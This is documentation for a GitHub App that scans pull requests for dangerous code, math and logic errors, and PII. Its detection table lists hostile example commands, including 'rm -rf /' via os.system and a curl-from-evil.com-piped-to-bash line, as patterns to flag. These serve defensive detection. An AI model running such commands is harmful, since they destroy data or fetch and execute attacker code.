> ## Documentation Index
> Fetch the complete documentation index at: https://docs.qwedai.com/llms.txt
> Use this file to discover all available pages before exploring further.

# QWED Security GitHub App

> QWED Security GitHub App scans pull requests using formal solvers (SymPy, Z3) and AST analysis to mathematically prove code, math, and logic correctness.

QWED Security is a **GitHub App** that automatically scans your Pull Requests using deterministic verification engines — not another LLM. It uses formal solvers (SymPy, Z3) and AST analysis to **mathematically prove** that code, math, and logic in your PRs are correct.

<Tip>
  **Unlike AI code reviewers that "guess," QWED Security provides deterministic proof. 1+1 always equals 2.**
</Tip>

## How it works

```text theme={null}
Pull Request Opened / Updated
        ↓
GitHub Webhook → QWED Security App
        ↓
QWEDLocal Verification Engine
  ├─ 🛡️ Code Security (AST Analysis)
  ├─ 🧮 Math Verification (SymPy)
  ├─ ⚖️ Logic Validation (Z3 Prover)
  └─ 🔒 PII Detection (Regex Patterns)
        ↓
✅ Pass  or  ❌ Fail
        ↓
Results posted as a GitHub Check Run
```

1. A developer opens or updates a Pull Request
2. GitHub sends a webhook event to the QWED Security App
3. The app creates a **Check Run** ("QWED Security") on the PR
4. Files are scanned using `QWEDLocal` — QWED's in-process verification engine
5. Results are posted directly to the **Checks tab** on the PR

## What QWED Security catches

### 🛡️ Code security (AST analysis)

Detects dangerous code patterns before they reach production:

| Pattern           | Example                                   | Risk                     |                     |
| ----------------- | ----------------------------------------- | ------------------------ | ------------------- |
| Shell injection   | `os.system('rm -rf /')`                   | Remote Code Execution    |                     |
| Eval/Exec         | `eval(user_input)`                        | Arbitrary code execution |                     |
| Pipe-to-shell     | \`curl [http://evil.com](http://evil.com) | bash\`                   | Supply chain attack |
| Hardcoded secrets | `api_key = "sk-proj-..."`                 | Credential exposure      |                     |
| Unsafe imports    | `import subprocess`                       | Privilege escalation     |                     |

### 🧮 Math verification (SymPy)

Validates mathematical formulas and constants — tax rate calculations, interest/NPV formulas, unit conversions, and financial compliance rules.

### ⚖️ Logic validation (Z3 prover)

Ensures boolean logic and business rules are satisfiable — contract clause contradictions, business rule conflicts, and constraint satisfaction.

### 🔒 PII detection

Detects sensitive data before it enters your codebase — credit card numbers, Social Security Numbers, email addresses, and API keys.

## Installation

1. Visit [QWED Security on GitHub Marketplace](https://github.com/marketplace/qwed-security)
2. Click **Install**
3. Select the repositories you want to protect
4. Done — QWED Security will automatically scan new Pull Requests

<Tip>
  QWED Security is a **Verified Publisher** on GitHub Marketplace. You can install it directly from the [Marketplace listing](https://github.com/marketplace/qwed-security).
</Tip>

### Plans

| Plan     | Scope                                   | Price       |
| -------- | --------------------------------------- | ----------- |
| **Free** | Open source & personal repositories     | \$0         |
| **Pro**  | Private repositories, priority scanning | Coming soon |

## Check run output

When QWED Security scans a PR, you'll see results directly in the **Checks tab**:

### ✅ All clear

```text theme={null}
QWED Verification Report

✅ Verified Files
✅ math_logic.py: Passed
✅ api_handler.py: Passed
```

### ❌ Issues found

```text theme={null}
QWED Verification Report

🚨 Issues Detected
❌ dangerous.py: SECURITY_RISK
  > Reason: Forbidden function 'os.system' detected

✅ Verified Files
✅ math_logic.py: Passed
```

## Privacy and security

* **No code storage**: Files are analyzed in-memory and discarded
* **Webhook verification**: HMAC-SHA256 signature validation
* **JWT authentication**: Short-lived JWT tokens (10-minute expiry)
* **Open source engines**: All verification logic is Apache 2.0

## Permissions

| Permission        | Access       | Purpose                                |
| ----------------- | ------------ | -------------------------------------- |
| **Checks**        | Read & Write | Create and update Check Runs on PRs    |
| **Pull Requests** | Read         | Read PR metadata and trigger scans     |
| **Contents**      | Read         | Read repository files for verification |

## Configuration

QWED Security works out-of-the-box with zero configuration for Python projects. Install the app and it starts scanning PRs immediately.

* **Languages**: Python, Go, Rust, and TypeScript
* **Trigger**: Pull Request events (opened, synchronized, reopened)

## QWED Security app vs GitHub Action

| Feature          | QWED Security (App)    | QWED GitHub Action         |
| ---------------- | ---------------------- | -------------------------- |
| **Type**         | Installed GitHub App   | CI/CD Action               |
| **Setup**        | One-click install      | Add to workflow YAML       |
| **Trigger**      | Automatic on PR        | Configured in workflow     |
| **Verification** | Code security focus    | Math, Logic, Code, SQL     |
| **LLM Required** | No (pure AST analysis) | Optional (for translation) |

The GitHub App provides **automatic, zero-config PR scanning**. The GitHub Action provides **configurable verification** within your CI/CD pipeline. They complement each other.

## Support

* **Contact Form**: [qwedai.com/contact](https://qwedai.com/contact)
* **Email**: [support@qwedai.com](mailto:support@qwedai.com)
* **Issues**: [GitHub Issues](https://github.com/QWED-AI/qwed-verification/issues)